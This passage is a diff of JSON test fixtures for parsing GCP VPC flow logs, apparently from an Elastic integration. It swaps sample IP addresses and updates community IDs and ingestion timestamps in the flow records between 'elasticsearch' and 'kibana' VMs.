subnetwork_name\":\"default\"},\"type\":\"gce_subnetwork\"},\"timestamp\":\"2019-06-14T03:50:15.857334727Z\"}", "kind": "event", "start": "2019-06-14T03:40:50.590894439Z", "end": "2019-06-14T03:40:50.702194466Z", @@ -12252,10 +12252,10 @@ "as": { "number": 15169 }, - "address": "203.0.113.134", + "address": "67.43.156.13", "port": 33552, "domain": "kibana", - "ip": "203.0.113.134" + "ip": "67.43.156.13" }, "source": { "address": "10.139.99.242", @@ -12269,7 +12269,7 @@ "preserve_original_event" ], "network": { - "community_id": "1:r7WME9xMisADgziCEygFYe5e1kY=", + "community_id": "1:RgpWxKDKI4bxYgUqX3Z0ZpipsO4=", "bytes": 209716, "name": "default", "transport": "tcp", @@ -12292,7 +12292,7 @@ "related": { "ip": [ "10.139.99.242", - "203.0.113.134" + "67.43.156.13" ] }, "gcp": { 
@@ -12328,8 +12328,8 @@ } }, "event": { - "ingested": "2021-06-09T10:48:29.868878Z", - "original": "{\"insertId\":\"ptjoddfhmrhgf\",\"jsonPayload\":{\"bytes_sent\":\"209716\",\"connection\":{\"dest_ip\":\"203.0.113.134\",\"dest_port\":33552,\"protocol\":6,\"src_ip\":\"10.139.99.242\",\"src_port\":9200},\"dest_instance\":{\"project_id\":\"my-sample-project\",\"region\":\"us-east1\",\"vm_name\":\"kibana\",\"zone\":\"us-east1-b\"},\"dest_location\":{\"asn\":15169,\"continent\":\"America\",\"country\":\"usa\"},\"dest_vpc\":{\"project_id\":\"my-sample-project\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"},\"end_time\":\"2019-06-14T03:49:55.213081491Z\",\"packets_sent\":\"262\",\"reporter\":\"SRC\",\"rtt_msec\":\"21\",\"src_instance\":{\"project_id\":\"my-sample-project\",\"region\":\"us-east1\",\"vm_name\":\"elasticsearch\",\"zone\":\"us-east1-b\"},\"src_vpc\":{\"project_id\":\"my-sample-project\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"},\"start_time\":\"2019-06-14T03:40:06.075957044Z\"},\"logName\":\"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows\",\"receiveTimestamp\":\"2019-06-14T03:50:15.857334727Z\",\"resource\":{\"labels\":{\"location\":\"us-east1-b\",\"project_id\":\"my-sample-project\",\"subnetwork_id\":\"758019854043528829\",\"subnetwork_name\":\"default\"},\"type\":\"gce_subnetwork\"},\"timestamp\":\"2019-06-14T03:50:15.857334727Z\"}", + "ingested": "2021-12-09T13:37:46.391830200Z", + "original": 
"{\"insertId\":\"ptjoddfhmrhgf\",\"jsonPayload\":{\"bytes_sent\":\"209716\",\"connection\":{\"dest_ip\":\"67.43.156.13\",\"dest_port\":33552,\"protocol\":6,\"src_ip\":\"10.139.99.242\",\"src_port\":9200},\"dest_instance\":{\"project_id\":\"my-sample-project\",\"region\":\"us-east1\",\"vm_name\":\"kibana\",\"zone\":\"us-east1-b\"},\"dest_location\":{\"asn\":15169,\"continent\":\"America\",\"country\":\"usa\"},\"dest_vpc\":{\"project_id\":\"my-sample-project\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"},\"end_time\":\"2019-06-14T03:49:55.213081491Z\",\"packets_sent\":\"262\",\"reporter\":\"SRC\",\"rtt_msec\":\"21\",\"src_instance\":{\"project_id\":\"my-sample-project\",\"region\":\"us-east1\",\"vm_name\":\"elasticsearch\",\"zone\":\"us-east1-b\"},\"src_vpc\":{\"project_id\":\"my-sample-project\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"},\"start_time\":\"2019-06-14T03:40:06.075957044Z\"},\"logName\":\"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows\",\"receiveTimestamp\":\"2019-06-14T03:50:15.857334727Z\",\"resource\":{\"labels\":{\"location\":\"us-east1-b\",\"project_id\":\"my-sample-project\",\"subnetwork_id\":\"758019854043528829\",\"subnetwork_name\":\"default\"},\"type\":\"gce_subnetwork\"},\"timestamp\":\"2019-06-14T03:50:15.857334727Z\"}", "kind": "event", "start": "2019-06-14T03:40:06.075957044Z", "end": "2019-06-14T03:49:55.213081491Z", @@ -12350,10 +12350,10 @@ "as": { "number": 15169 }, - "address": "203.0.113.134", + "address": "67.43.156.13", "port": 33556, "domain": "kibana", - "ip": "203.0.113.134" + "ip": "67.43.156.13" }, "source": { "address": "10.139.99.242", @@ -12367,7 +12367,7 @@ "preserve_original_event" ], "network": { - "community_id": "1:S6achMS1ovFuI9FmGgW49nTJQXk=", + "community_id": "1:VN7YV4epNl2EJKRguZ3Rx7ylmok=", "bytes": 165643, "name": "default", "transport": "tcp", @@ -12390,7 +12390,7 @@ "related": { "ip": [ "10.139.99.242", - "203.0.113.134" + "67.43.156.13" ] }, "gcp": { 
@@ -12426,8 +12426,8 @@ } }, "event": { - "ingested": "2021-06-09T10:48:29.868881300Z", - "original": "{\"insertId\":\"ptjoddfhmrhgg\",\"jsonPayload\":{\"bytes_sent\":\"165643\",\"connection\":{\"dest_ip\":\"203.0.113.134\",\"dest_port\":33556,\"protocol\":6,\"src_ip\":\"10.139.99.242\",\"src_port\":9200},\"dest_instance\":{\"project_id\":\"my-sample-project\",\"region\":\"us-east1\",\"vm_name\":\"kibana\",\"zone\":\"us-east1-b\"},\"dest_location\":{\"asn\":15169,\"continent\":\"America\",\"country\":\"usa\"},\"dest_vpc\":{\"project_id\":\"my-sample-project\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"},\"end_time\":\"2019-06-14T03:49:59.565214145Z\",\"packets_sent\":\"256\",\"reporter\":\"SRC\",\"rtt_msec\":\"133\",\"src_instance\":{\"project_id\":\"my-sample-project\",\"region\":\"us-east1\",\"vm_name\":\"elasticsearch\",\"zone\":\"us-east1-b\"},\"src_vpc\":{\"project_id\":\"my-sample-project\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"},\"start_time\":\"2019-06-14T03:40:03.062674441Z\"},\"logName\":\"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows\",\"receiveTimestamp\":\"2019-06-14T03:50:15.857334727Z\",\"resource\":{\"labels\":{\"location\":\"us-east1-b\",\"project_id\":\"my-sample-project\",\"subnetwork_id\":\"758019854043528829\",\"subnetwork_name\":\"default\"},\"type\":\"gce_subnetwork\"},\"timestamp\":\"2019-06-14T03:50:15.857334727Z\"}", + "ingested": "2021-12-09T13:37:46.391834400Z", + "original": 
"{\"insertId\":\"ptjoddfhmrhgg\",\"jsonPayload\":{\"bytes_sent\":\"165643\",\"connection\":{\"dest_ip\":\"67.43.156.13\",\"dest_port\":33556,\"protocol\":6,\"src_ip\":\"10.139.99.242\",\"src_port\":9200},\"dest_instance\":{\"project_id\":\"my-sample-project\",\"region\":\"us-east1\",\"vm_name\":\"kibana\",\"zone\":\"us-east1-b\"},\"dest_location\":{\"asn\":15169,\"continent\":\"America\",\"country\":\"usa\"},\"dest_vpc\":{\"project_id\":\"my-sample-project\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"},\"end_time\":\"2019-06-14T03:49:59.565214145Z\",\"packets_sent\":\"256\",\"reporter\":\"SRC\",\"rtt_msec\":\"133\",\"src_instance\":{\"project_id\":\"my-sample-project\",\"region\":\"us-east1\",\"vm_name\":\"elasticsearch\",\"zone\":\"us-east1-b\"},\"src_vpc\":{\"project_id\":\"my-sample-project\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"},\"start_time\":\"2019-06-14T03:40:03.062674441Z\"},\"logName\":\"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows\",\"receiveTimestamp\":\"2019-06-14T03:50:15.857334727Z\",\"resource\":{\"labels\":{\"location\":\"us-east1-b\",\"project_id\":\"my-sample-project\",\"subnetwork_id\":\"758019854043528829\",\"subnetwork_name\":\"default\"},\"type\":\"gce_subnetwork\"},\"timestamp\":\"2019-06-14T03:50:15.857334727Z\"}", "kind": "event", "start": "2019-06-14T03:40:03.062674441Z", "end": "2019-06-14T03:49:59.565214145Z", @@ -12450,9 +12450,9 @@ "as": { "number": 33652 }, - "address": "203.0.113.58", + "address": "67.43.156.13", "port": 65257, - "ip": "203.0.113.58" + "ip": "67.43.156.13" }, "source": { "address": "10.139.99.242", @@ -12466,7 +12466,7 @@ "preserve_original_event" ], "network": { - "community_id": "1:DqikX2/VHNCo3K4Z/FQLlk5o8C4=", + "community_id": "1:IOiOyU4WA7IZikjr7eAoksKW7Mw=", "bytes": 65890, "transport": "tcp", "type": "ipv4", @@ -12481,7 +12481,7 @@ "related": { "ip": [ "10.139.99.242", - "203.0.113.58" + "67.43.156.13" ] }, "gcp": { 
@@ -12505,8 +12505,8 @@ } }, "event": { - "ingested": "2021-06-09T10:48:29.868884500Z", - "original": "{\"insertId\":\"ptjoddfhmrhgb\",\"jsonPayload\":{\"bytes_sent\":\"65890\",\"connection\":{\"dest_ip\":\"203.0.113.58\",\"dest_port\":65257,\"protocol\":6,\"src_ip\":\"10.139.99.242\",\"src_port\":9200},\"dest_location\":{\"asn\":33652,\"city\":\"Broomfield\",\"continent\":\"America\",\"country\":\"usa\",\"region\":\"Colorado\"},\"end_time\":\"2019-06-14T03:49:56.220614265Z\",\"packets_sent\":\"593\",\"reporter\":\"SRC\",\"rtt_msec\":\"220\",\"src_instance\":{\"project_id\":\"my-sample-project\",\"region\":\"us-east1\",\"vm_name\":\"elasticsearch\",\"zone\":\"us-east1-b\"},\"src_vpc\":{\"project_id\":\"my-sample-project\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"},\"start_time\":\"2019-06-14T03:39:59.403388091Z\"},\"logName\":\"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows\",\"receiveTimestamp\":\"2019-06-14T03:50:15.857334727Z\",\"resource\":{\"labels\":{\"location\":\"us-east1-b\",\"project_id\":\"my-sample-project\",\"subnetwork_id\":\"758019854043528829\",\"subnetwork_name\":\"default\"},\"type\":\"gce_subnetwork\"},\"timestamp\":\"2019-06-14T03:50:15.857334727Z\"}", + "ingested": "2021-12-09T13:37:46.391839400Z", + "original": 
"{\"insertId\":\"ptjoddfhmrhgb\",\"jsonPayload\":{\"bytes_sent\":\"65890\",\"connection\":{\"dest_ip\":\"67.43.156.13\",\"dest_port\":65257,\"protocol\":6,\"src_ip\":\"10.139.99.242\",\"src_port\":9200},\"dest_location\":{\"asn\":33652,\"city\":\"Broomfield\",\"continent\":\"America\",\"country\":\"usa\",\"region\":\"Colorado\"},\"end_time\":\"2019-06-14T03:49:56.220614265Z\",\"packets_sent\":\"593\",\"reporter\":\"SRC\",\"rtt_msec\":\"220\",\"src_instance\":{\"project_id\":\"my-sample-project\",\"region\":\"us-east1\",\"vm_name\":\"elasticsearch\",\"zone\":\"us-east1-b\"},\"src_vpc\":{\"project_id\":\"my-sample-project\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"},\"start_time\":\"2019-06-14T03:39:59.403388091Z\"},\"logName\":\"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows\",\"receiveTimestamp\":\"2019-06-14T03:50:15.857334727Z\",\"resource\":{\"labels\":{\"location\":\"us-east1-b\",\"project_id\":\"my-sample-project\",\"subnetwork_id\":\"758019854043528829\",\"subnetwork_name\":\"default\"},\"type\":\"gce_subnetwork\"},\"timestamp\":\"2019-06-14T03:50:15.857334727Z\"}", "kind": "event", "start": "2019-06-14T03:39:59.403388091Z", "end": "2019-06-14T03:49:56.220614265Z", @@ -12533,18 +12533,18 @@ "as": { "number": 15169 }, - "address": "203.0.113.134", + "address": "67.43.156.13", "port": 33538, "bytes": 62620, "domain": "kibana", - "ip": "203.0.113.134", + "ip": "67.43.156.13", "packets": 358 }, "tags": [ "preserve_original_event" ], "network": { - "community_id": "1:NoAWHdeVVE/1VjCAle3M10HSrH0=", + "community_id": "1:ZH1or4RA5RqLjC/iRPmayKRTLeA=", "bytes": 62620, "name": "default", "transport": "tcp", @@ -12566,7 +12566,7 @@ }, "related": { "ip": [ - "203.0.113.134", + "67.43.156.13", "10.139.99.242" ] }, 
@@ -12603,8 +12603,8 @@ } }, "event": { - "ingested": "2021-06-09T10:48:29.868887800Z", - "original": "{\"insertId\":\"ptjoddfhmrhgs\",\"jsonPayload\":{\"bytes_sent\":\"62620\",\"connection\":{\"dest_ip\":\"10.139.99.242\",\"dest_port\":9200,\"protocol\":6,\"src_ip\":\"203.0.113.134\",\"src_port\":33538},\"dest_instance\":{\"project_id\":\"my-sample-project\",\"region\":\"us-east1\",\"vm_name\":\"elasticsearch\",\"zone\":\"us-east1-b\"},\"dest_vpc\":{\"project_id\":\"my-sample-project\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"},\"end_time\":\"2019-06-14T03:49:59.565124617Z\",\"packets_sent\":\"358\",\"reporter\":\"DEST\",\"rtt_msec\":\"250\",\"src_instance\":{\"project_id\":\"my-sample-project\",\"region\":\"us-east1\",\"vm_name\":\"kibana\",\"zone\":\"us-east1-b\"},\"src_location\":{\"asn\":15169,\"continent\":\"America\",\"country\":\"usa\"},\"src_vpc\":{\"project_id\":\"my-sample-project\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"},\"start_time\":\"2019-06-14T03:40:01.074952616Z\"},\"logName\":\"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows\",\"receiveTimestamp\":\"2019-06-14T03:50:15.857334727Z\",\"resource\":{\"labels\":{\"location\":\"us-east1-b\",\"project_id\":\"my-sample-project\",\"subnetwork_id\":\"758019854043528829\",\"subnetwork_name\":\"default\"},\"type\":\"gce_subnetwork\"},\"timestamp\":\"2019-06-14T03:50:15.857334727Z\"}", + "ingested": "2021-12-09T13:37:46.391844200Z", + "original": 
"{\"insertId\":\"ptjoddfhmrhgs\",\"jsonPayload\":{\"bytes_sent\":\"62620\",\"connection\":{\"dest_ip\":\"10.139.99.242\",\"dest_port\":9200,\"protocol\":6,\"src_ip\":\"67.43.156.13\",\"src_port\":33538},\"dest_instance\":{\"project_id\":\"my-sample-project\",\"region\":\"us-east1\",\"vm_name\":\"elasticsearch\",\"zone\":\"us-east1-b\"},\"dest_vpc\":{\"project_id\":\"my-sample-project\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"},\"end_time\":\"2019-06-14T03:49:59.565124617Z\",\"packets_sent\":\"358\",\"reporter\":\"DEST\",\"rtt_msec\":\"250\",\"src_instance\":{\"project_id\":\"my-sample-project\",\"region\":\"us-east1\",\"vm_name\":\"kibana\",\"zone\":\"us-east1-b\"},\"src_location\":{\"asn\":15169,\"continent\":\"America\",\"country\":\"usa\"},\"src_vpc\":{\"project_id\":\"my-sample-project\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"},\"start_time\":\"2019-06-14T03:40:01.074952616Z\"},\"logName\":\"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows\",\"receiveTimestamp\":\"2019-06-14T03:50:15.857334727Z\",\"resource\":{\"labels\":{\"location\":\"us-east1-b\",\"project_id\":\"my-sample-project\",\"subnetwork_id\":\"758019854043528829\",\"subnetwork_name\":\"default\"},\"type\":\"gce_subnetwork\"},\"timestamp\":\"2019-06-14T03:50:15.857334727Z\"}", "kind": "event", "start": "2019-06-14T03:40:01.074952616Z", "end": "2019-06-14T03:49:59.565124617Z", @@ -12625,10 +12625,10 @@ "as": { "number": 15169 }, - "address": "203.0.113.134", + "address": "67.43.156.13", "port": 33692, "domain": "kibana", - "ip": "203.0.113.134" + "ip": "67.43.156.13" }, "source": { "address": "10.139.99.242", @@ -12642,7 +12642,7 @@ "preserve_original_event" ], "network": { - "community_id": "1:ICaRxvQCM8Iv02SAaUpscf0dmFk=", + "community_id": "1:JliXl736rywggK/Xuo92yo5WPuY=", "bytes": 185520, "name": "default", "transport": "tcp", @@ -12665,7 +12665,7 @@ "related": { "ip": [ "10.139.99.242", - "203.0.113.134" + "67.43.156.13" ] }, "gcp": { 
@@ -12701,8 +12701,8 @@ } }, "event": { - "ingested": "2021-06-09T10:48:29.868891200Z", - "original": "{\"insertId\":\"ptjoddfhmrhge\",\"jsonPayload\":{\"bytes_sent\":\"185520\",\"connection\":{\"dest_ip\":\"203.0.113.134\",\"dest_port\":33692,\"protocol\":6,\"src_ip\":\"10.139.99.242\",\"src_port\":9200},\"dest_instance\":{\"project_id\":\"my-sample-project\",\"region\":\"us-east1\",\"vm_name\":\"kibana\",\"zone\":\"us-east1-b\"},\"dest_location\":{\"asn\":15169,\"continent\":\"America\",\"country\":\"usa\"},\"dest_vpc\":{\"project_id\":\"my-sample-project\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"},\"end_time\":\"2019-06-14T03:49:59.565137912Z\",\"packets_sent\":\"249\",\"reporter\":\"SRC\",\"rtt_msec\":\"181\",\"src_instance\":{\"project_id\":\"my-sample-project\",\"region\":\"us-east1\",\"vm_name\":\"elasticsearch\",\"zone\":\"us-east1-b\"},\"src_vpc\":{\"project_id\":\"my-sample-project\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"},\"start_time\":\"2019-06-14T03:40:00.558259934Z\"},\"logName\":\"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows\",\"receiveTimestamp\":\"2019-06-14T03:50:15.857334727Z\",\"resource\":{\"labels\":{\"location\":\"us-east1-b\",\"project_id\":\"my-sample-project\",\"subnetwork_id\":\"758019854043528829\",\"subnetwork_name\":\"default\"},\"type\":\"gce_subnetwork\"},\"timestamp\":\"2019-06-14T03:50:15.857334727Z\"}", + "ingested": "2021-12-09T13:37:46.391849600Z", + "original": 
"{\"insertId\":\"ptjoddfhmrhge\",\"jsonPayload\":{\"bytes_sent\":\"185520\",\"connection\":{\"dest_ip\":\"67.43.156.13\",\"dest_port\":33692,\"protocol\":6,\"src_ip\":\"10.139.99.242\",\"src_port\":9200},\"dest_instance\":{\"project_id\":\"my-sample-project\",\"region\":\"us-east1\",\"vm_name\":\"kibana\",\"zone\":\"us-east1-b\"},\"dest_location\":{\"asn\":15169,\"continent\":\"America\",\"country\":\"usa\"},\"dest_vpc\":{\"project_id\":\"my-sample-project\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"},\"end_time\":\"2019-06-14T03:49:59.565137912Z\",\"packets_sent\":\"249\",\"reporter\":\"SRC\",\"rtt_msec\":\"181\",\"src_instance\":{\"project_id\":\"my-sample-project\",\"region\":\"us-east1\",\"vm_name\":\"elasticsearch\",\"zone\":\"us-east1-b\"},\"src_vpc\":{\"project_id\":\"my-sample-project\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"},\"start_time\":\"2019-06-14T03:40:00.558259934Z\"},\"logName\":\"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows\",\"receiveTimestamp\":\"2019-06-14T03:50:15.857334727Z\",\"resource\":{\"labels\":{\"location\":\"us-east1-b\",\"project_id\":\"my-sample-project\",\"subnetwork_id\":\"758019854043528829\",\"subnetwork_name\":\"default\"},\"type\":\"gce_subnetwork\"},\"timestamp\":\"2019-06-14T03:50:15.857334727Z\"}", "kind": "event", "start": "2019-06-14T03:40:00.558259934Z", "end": "2019-06-14T03:49:59.565137912Z", @@ -12725,9 +12725,9 @@ "as": { "number": 33652 }, - "address": "203.0.113.58", + "address": "67.43.156.13", "port": 65262, - "ip": "203.0.113.58" + "ip": "67.43.156.13" }, "source": { "address": "10.139.99.242", @@ -12741,7 +12741,7 @@ "preserve_original_event" ], "network": { - "community_id": "1:RtfThXVVNPvXxMgtvtqlB4QmIlQ=", + "community_id": "1:0ZkH0evnSSMhLkKCLL1Ehnorl9s=", "bytes": 33269, "transport": "tcp", "type": "ipv4", @@ -12756,7 +12756,7 @@ "related": { "ip": [ "10.139.99.242", - "203.0.113.58" + "67.43.156.13" ] }, "gcp": { 
@@ -12777,8 +12777,8 @@ } }, "event": { - "ingested": "2021-06-09T10:48:29.868894400Z", - "original": "{\"insertId\":\"ptjoddfhmrhgc\",\"jsonPayload\":{\"bytes_sent\":\"33269\",\"connection\":{\"dest_ip\":\"203.0.113.58\",\"dest_port\":65262,\"protocol\":6,\"src_ip\":\"10.139.99.242\",\"src_port\":9200},\"dest_location\":{\"asn\":33652,\"city\":\"Broomfield\",\"continent\":\"America\",\"country\":\"usa\",\"region\":\"Colorado\"},\"end_time\":\"2019-06-14T03:49:56.220741828Z\",\"packets_sent\":\"517\",\"reporter\":\"SRC\",\"src_instance\":{\"project_id\":\"my-sample-project\",\"region\":\"us-east1\",\"vm_name\":\"elasticsearch\",\"zone\":\"us-east1-b\"},\"src_vpc\":{\"project_id\":\"my-sample-project\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"},\"start_time\":\"2019-06-14T03:40:00.251430011Z\"},\"logName\":\"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows\",\"receiveTimestamp\":\"2019-06-14T03:50:15.857334727Z\",\"resource\":{\"labels\":{\"location\":\"us-east1-b\",\"project_id\":\"my-sample-project\",\"subnetwork_id\":\"758019854043528829\",\"subnetwork_name\":\"default\"},\"type\":\"gce_subnetwork\"},\"timestamp\":\"2019-06-14T03:50:15.857334727Z\"}", + "ingested": "2021-12-09T13:37:46.391853100Z", + "original": 
"{\"insertId\":\"ptjoddfhmrhgc\",\"jsonPayload\":{\"bytes_sent\":\"33269\",\"connection\":{\"dest_ip\":\"67.43.156.13\",\"dest_port\":65262,\"protocol\":6,\"src_ip\":\"10.139.99.242\",\"src_port\":9200},\"dest_location\":{\"asn\":33652,\"city\":\"Broomfield\",\"continent\":\"America\",\"country\":\"usa\",\"region\":\"Colorado\"},\"end_time\":\"2019-06-14T03:49:56.220741828Z\",\"packets_sent\":\"517\",\"reporter\":\"SRC\",\"src_instance\":{\"project_id\":\"my-sample-project\",\"region\":\"us-east1\",\"vm_name\":\"elasticsearch\",\"zone\":\"us-east1-b\"},\"src_vpc\":{\"project_id\":\"my-sample-project\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"},\"start_time\":\"2019-06-14T03:40:00.251430011Z\"},\"logName\":\"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows\",\"receiveTimestamp\":\"2019-06-14T03:50:15.857334727Z\",\"resource\":{\"labels\":{\"location\":\"us-east1-b\",\"project_id\":\"my-sample-project\",\"subnetwork_id\":\"758019854043528829\",\"subnetwork_name\":\"default\"},\"type\":\"gce_subnetwork\"},\"timestamp\":\"2019-06-14T03:50:15.857334727Z\"}", "kind": "event", "start": "2019-06-14T03:40:00.251430011Z", "end": "2019-06-14T03:49:56.220741828Z", @@ -12805,18 +12805,18 @@ "as": { "number": 15169 }, - "address": "203.0.113.134", + "address": "67.43.156.13", "port": 33556, "bytes": 58811, "domain": "kibana", - "ip": "203.0.113.134", + "ip": "67.43.156.13", "packets": 358 }, "tags": [ "preserve_original_event" ], "network": { - "community_id": "1:S6achMS1ovFuI9FmGgW49nTJQXk=", + "community_id": "1:VN7YV4epNl2EJKRguZ3Rx7ylmok=", "bytes": 58811, "name": "default", "transport": "tcp", @@ -12838,7 +12838,7 @@ }, "related": { "ip": [ - "203.0.113.134", + "67.43.156.13", "10.139.99.242" ] }, 
@@ -12875,8 +12875,8 @@ } }, "event": { - "ingested": "2021-06-09T10:48:29.868897700Z", - "original": "{\"insertId\":\"ptjoddfhmrhg7\",\"jsonPayload\":{\"bytes_sent\":\"58811\",\"connection\":{\"dest_ip\":\"10.139.99.242\",\"dest_port\":9200,\"protocol\":6,\"src_ip\":\"203.0.113.134\",\"src_port\":33556},\"dest_instance\":{\"project_id\":\"my-sample-project\",\"region\":\"us-east1\",\"vm_name\":\"elasticsearch\",\"zone\":\"us-east1-b\"},\"dest_vpc\":{\"project_id\":\"my-sample-project\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"},\"end_time\":\"2019-06-14T03:49:59.565214145Z\",\"packets_sent\":\"358\",\"reporter\":\"DEST\",\"rtt_msec\":\"133\",\"src_instance\":{\"project_id\":\"my-sample-project\",\"region\":\"us-east1\",\"vm_name\":\"kibana\",\"zone\":\"us-east1-b\"},\"src_location\":{\"asn\":15169,\"continent\":\"America\",\"country\":\"usa\"},\"src_vpc\":{\"project_id\":\"my-sample-project\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"},\"start_time\":\"2019-06-14T03:40:03.062674441Z\"},\"logName\":\"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows\",\"receiveTimestamp\":\"2019-06-14T03:50:15.857334727Z\",\"resource\":{\"labels\":{\"location\":\"us-east1-b\",\"project_id\":\"my-sample-project\",\"subnetwork_id\":\"758019854043528829\",\"subnetwork_name\":\"default\"},\"type\":\"gce_subnetwork\"},\"timestamp\":\"2019-06-14T03:50:15.857334727Z\"}", + "ingested": "2021-12-09T13:37:46.391858400Z", + "original": 
"{\"insertId\":\"ptjoddfhmrhg7\",\"jsonPayload\":{\"bytes_sent\":\"58811\",\"connection\":{\"dest_ip\":\"10.139.99.242\",\"dest_port\":9200,\"protocol\":6,\"src_ip\":\"67.43.156.13\",\"src_port\":33556},\"dest_instance\":{\"project_id\":\"my-sample-project\",\"region\":\"us-east1\",\"vm_name\":\"elasticsearch\",\"zone\":\"us-east1-b\"},\"dest_vpc\":{\"project_id\":\"my-sample-project\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"},\"end_time\":\"2019-06-14T03:49:59.565214145Z\",\"packets_sent\":\"358\",\"reporter\":\"DEST\",\"rtt_msec\":\"133\",\"src_instance\":{\"project_id\":\"my-sample-project\",\"region\":\"us-east1\",\"vm_name\":\"kibana\",\"zone\":\"us-east1-b\"},\"src_location\":{\"asn\":15169,\"continent\":\"America\",\"country\":\"usa\"},\"src_vpc\":{\"project_id\":\"my-sample-project\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"},\"start_time\":\"2019-06-14T03:40:03.062674441Z\"},\"logName\":\"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows\",\"receiveTimestamp\":\"2019-06-14T03:50:15.857334727Z\",\"resource\":{\"labels\":{\"location\":\"us-east1-b\",\"project_id\":\"my-sample-project\",\"subnetwork_id\":\"758019854043528829\",\"subnetwork_name\":\"default\"},\"type\":\"gce_subnetwork\"},\"timestamp\":\"2019-06-14T03:50:15.857334727Z\"}", "kind": "event", "start": "2019-06-14T03:40:03.062674441Z", "end": "2019-06-14T03:49:59.565214145Z", @@ -12897,10 +12897,10 @@ "as": { "number": 15169 }, - "address": "198.51.100.248", + "address": "67.43.156.14", "port": 9200, "domain": "elasticsearch", - "ip": "198.51.100.248" + "ip": "67.43.156.14" }, "source": { "address": "10.87.40.76", @@ -12914,7 +12914,7 @@ "preserve_original_event" ], "network": { - "community_id": "1:RJ5OB/OF2Dh8aqt0X5ikvUiYbOE=", + "community_id": "1:OhbIPr/28Fsp+gsHSdoT+T8vBZA=", "bytes": 5220, "name": "default", "transport": "tcp", @@ -12937,7 +12937,7 @@ "related": { "ip": [ "10.87.40.76", - "198.51.100.248" + "67.43.156.14" ] }, "gcp": { 
@@ -12970,8 +12970,8 @@ } }, "event": { - "ingested": "2021-06-09T10:48:29.868901100Z", - "original": "{\"insertId\":\"ptjoddfhmrhgq\",\"jsonPayload\":{\"bytes_sent\":\"5220\",\"connection\":{\"dest_ip\":\"198.51.100.248\",\"dest_port\":9200,\"protocol\":6,\"src_ip\":\"10.87.40.76\",\"src_port\":33876},\"dest_instance\":{\"project_id\":\"my-sample-project\",\"region\":\"us-east1\",\"vm_name\":\"elasticsearch\",\"zone\":\"us-east1-b\"},\"dest_location\":{\"asn\":15169,\"continent\":\"America\",\"country\":\"usa\"},\"dest_vpc\":{\"project_id\":\"my-sample-project\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"},\"end_time\":\"2019-06-14T03:49:37.933338264Z\",\"packets_sent\":\"86\",\"reporter\":\"SRC\",\"src_instance\":{\"project_id\":\"my-sample-project\",\"region\":\"us-east1\",\"vm_name\":\"kibana\",\"zone\":\"us-east1-b\"},\"src_vpc\":{\"project_id\":\"my-sample-project\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"},\"start_time\":\"2019-06-14T03:40:08.466706102Z\"},\"logName\":\"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows\",\"receiveTimestamp\":\"2019-06-14T03:50:15.857334727Z\",\"resource\":{\"labels\":{\"location\":\"us-east1-b\",\"project_id\":\"my-sample-project\",\"subnetwork_id\":\"758019854043528829\",\"subnetwork_name\":\"default\"},\"type\":\"gce_subnetwork\"},\"timestamp\":\"2019-06-14T03:50:15.857334727Z\"}", + "ingested": "2021-12-09T13:37:46.391889200Z", + "original": 
"{\"insertId\":\"ptjoddfhmrhgq\",\"jsonPayload\":{\"bytes_sent\":\"5220\",\"connection\":{\"dest_ip\":\"67.43.156.14\",\"dest_port\":9200,\"protocol\":6,\"src_ip\":\"10.87.40.76\",\"src_port\":33876},\"dest_instance\":{\"project_id\":\"my-sample-project\",\"region\":\"us-east1\",\"vm_name\":\"elasticsearch\",\"zone\":\"us-east1-b\"},\"dest_location\":{\"asn\":15169,\"continent\":\"America\",\"country\":\"usa\"},\"dest_vpc\":{\"project_id\":\"my-sample-project\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"},\"end_time\":\"2019-06-14T03:49:37.933338264Z\",\"packets_sent\":\"86\",\"reporter\":\"SRC\",\"src_instance\":{\"project_id\":\"my-sample-project\",\"region\":\"us-east1\",\"vm_name\":\"kibana\",\"zone\":\"us-east1-b\"},\"src_vpc\":{\"project_id\":\"my-sample-project\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"},\"start_time\":\"2019-06-14T03:40:08.466706102Z\"},\"logName\":\"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows\",\"receiveTimestamp\":\"2019-06-14T03:50:15.857334727Z\",\"resource\":{\"labels\":{\"location\":\"